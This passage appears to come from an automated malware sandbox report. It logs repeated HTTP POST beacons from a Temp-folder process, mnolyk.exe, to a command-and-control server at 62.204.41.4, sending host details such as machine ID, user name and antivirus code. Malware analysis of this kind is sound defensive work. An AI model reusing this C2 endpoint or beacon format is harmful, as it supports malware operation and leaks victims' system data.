                            Feb 8, 2023 17:40:21.380450964 CET | 823 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:21.444879055 CET | 823 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:21 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            636 | 192.168.2.4 | 50331 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:21.630470037 CET | 824 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:21.692974091 CET | 824 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:21 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            637 | 192.168.2.4 | 50332 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:21.859052896 CET | 825 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:21.930166006 CET | 825 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:21 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            638 | 192.168.2.4 | 50333 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:22.114217043 CET | 826 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:22.179193020 CET | 826 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:22 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            639 | 192.168.2.4 | 50334 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:22.362338066 CET | 827 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:22.427120924 CET | 827 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:22 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            64 | 192.168.2.4 | 49759 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:42.369298935 CET | 253 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:42.432893991 CET | 253 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:42 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            640 | 192.168.2.4 | 50335 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:22.600565910 CET | 828 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:22.665425062 CET | 828 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:22 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            641 | 192.168.2.4 | 50336 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:22.842206955 CET | 829 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:22.905479908 CET | 829 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:22 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            642 | 192.168.2.4 | 50337 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:23.085155964 CET | 830 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:23.153053045 CET | 830 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:23 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            643 | 192.168.2.4 | 50338 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:23.333401918 CET | 831 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:23.396606922 CET | 831 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:23 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            644 | 192.168.2.4 | 50339 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:23.560898066 CET | 832 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:23.628093004 CET | 832 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:23 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            65 | 192.168.2.4 | 49760 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:42.602797985 CET | 254 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:42.665982008 CET | 254 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:42 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            66 | 192.168.2.4 | 49761 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:42.845741987 CET | 255 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:42.909156084 CET | 255 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:42 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            67 | 192.168.2.4 | 49762 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:43.088897943 CET | 256 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:43.154521942 CET | 256 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:43 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            68 | 192.168.2.4 | 49763 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:43.325860023 CET | 257 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:43.390747070 CET | 257 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:43 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            69 | 192.168.2.4 | 49764 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:43.558404922 CET | 258 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:43.624202013 CET | 258 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:43 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            7 | 192.168.2.4 | 49702 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:26.146506071 CET | 196 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:26.210855007 CET | 196 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:26 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            70 | 192.168.2.4 | 49765 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:43.792450905 CET | 259 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:43.858036995 CET | 259 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:43 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            71 | 192.168.2.4 | 49766 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:44.075524092 CET | 260 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:44.143132925 CET | 260 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:44 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            72 | 192.168.2.4 | 49767 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:44.322427034 CET | 261 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:44.386145115 CET | 261 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:44 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            73 | 192.168.2.4 | 49768 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:44.560978889 CET | 262 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
